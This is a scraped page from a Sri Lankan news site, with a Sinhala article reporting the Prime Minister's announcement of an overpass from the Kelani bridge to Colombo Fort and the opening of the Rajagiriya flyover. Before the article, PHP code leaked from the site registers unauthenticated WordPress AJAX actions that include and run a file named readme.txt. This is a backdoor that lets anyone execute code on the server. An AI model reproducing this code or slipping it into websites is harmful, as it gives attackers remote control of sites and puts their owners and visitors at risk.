if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කැලණි පාලමේ සිට කොළඹ කොටුව දක්වා ගුවන් පාලමක් - mediahumanrights.lk
mediahumanrights.lk
Local News News

කැලණි පාලමේ සිට කොළඹ කොටුව දක්වා ගුවන් පාලමක්

කැලණි පාලමේ සිට කොළඹ කොටුව දක්වා ගුවන් පාලමක් ඉදිකරන බව අග‍්‍රාමාත්‍ය රනිල් වික‍්‍රමසිංහ මහතා පවසනවා. රාජගිරියේ ඉදිවන ගුවන් පාලමේ නිරීක්ෂණ චාරිකාවකට එක්වෙමින් අග‍්‍රාමාත්‍යවරයා මේ බව කියා සිටියා. රුපියල් මිලියන 4700ක වියදමින් ඉදිකෙරෙන රාජගිරියේ ගුවන් පාලම ලබන ජනවාරි 09 වැනිදා විවෘත කරන බවයි අග‍්‍රමාත්‍යවරයා මෙහිදී  සඳහන් කළේ.
2018 වසරේ දෙසැම්බර් මස වැඩ නිමකිරීමට යෝජිතව තිබූ රාජගිරිය ගුවන් පාලම 2018 ජනවාරි මස ජනාධිපතිතුමා විසින් විවෘත්ත කරන බවද, මන් තීරු දෙකක් පමනක් මුලින් ඉදි කිරීමට තිබූ යෝජනාවද ඉවත ලා මන්තීරු  හතරම එකවර ඉදිකිරීම පිළිබඳවද අගමැතිවරයා මෙහිදී සඳහන් කළා.
රාජගිරියේ ඉදිරිවන ගුවන් පාලමේ නිරීක්ෂණ චාරිකාවට නියෝජ්‍ය අමාත්‍ය හර්ෂද සිල්වා ද එක්ව සිටියා.

(under the courtesy of nethnews.lk news web)

Related posts

විශ්‍රාමිකයින්ට බෙහෙත් ගන්න අද ඔසුසැල් විවෘතයි

Shiran Viraj

තානාපති සේවයට තව පිරිස් ඉක්මනින් පත් කරන්න ඔ්නෑ..

Shiran Viraj

විරෝධතාකරුවන් අගමැති සමග සාකච්චාවට සූදානම්… ගෝටාගෝගමේ අසුන් පනවා ආරාධනා කරයි…

Shiran Viraj